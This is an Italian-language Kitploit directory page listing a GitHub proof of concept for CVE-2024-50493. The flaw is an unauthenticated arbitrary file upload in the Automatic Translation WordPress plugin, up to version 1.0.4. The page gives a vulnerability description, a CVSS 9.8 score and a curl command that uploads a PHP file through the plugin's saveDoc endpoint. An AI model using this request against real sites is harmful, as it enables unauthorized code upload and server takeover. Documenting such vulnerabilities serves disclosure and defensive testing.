Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-50493 — Automatic Translation <= 1.0.4 - Caricamento arbitrario di file non autenticato | Kitploit
Strumenti/GitHubGitHub/randomrobbiebf/cve-2024-50493
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingSviluppo Payload
GitHubrandomrobbiebf/cve-2024-50493

CVE-2024-50493

Automatic Translation <= 1.0.4 - Caricamento arbitrario di file non autenticato

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-50493

Automatic Translation <= 1.0.4 - Caricamento Arbitrario di File Non Autenticato

Descrizione:

Il plugin Automatic Translation per WordPress è vulnerabile a caricamenti arbitrari di file a causa della mancanza di validazione del tipo di file in tutte le versioni fino alla 1.0.4 inclusa. Ciò consente a aggressori non autenticati di caricare file arbitrari sul server del sito interessato, il che potrebbe rendere possibile l'esecuzione remota di codice.

root@kitploit:~
CVE: CVE-2024-50493
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: automatic-translation

POC

root@kitploit:~
curl -X POST \
  -F "file_name=info.php" \
  -F "file_url=@/tmp/info.php" \
  "http://kubernetes.docker.internal/wp-json/automatic-translator/v1/saveDoc"
Scarica lo strumento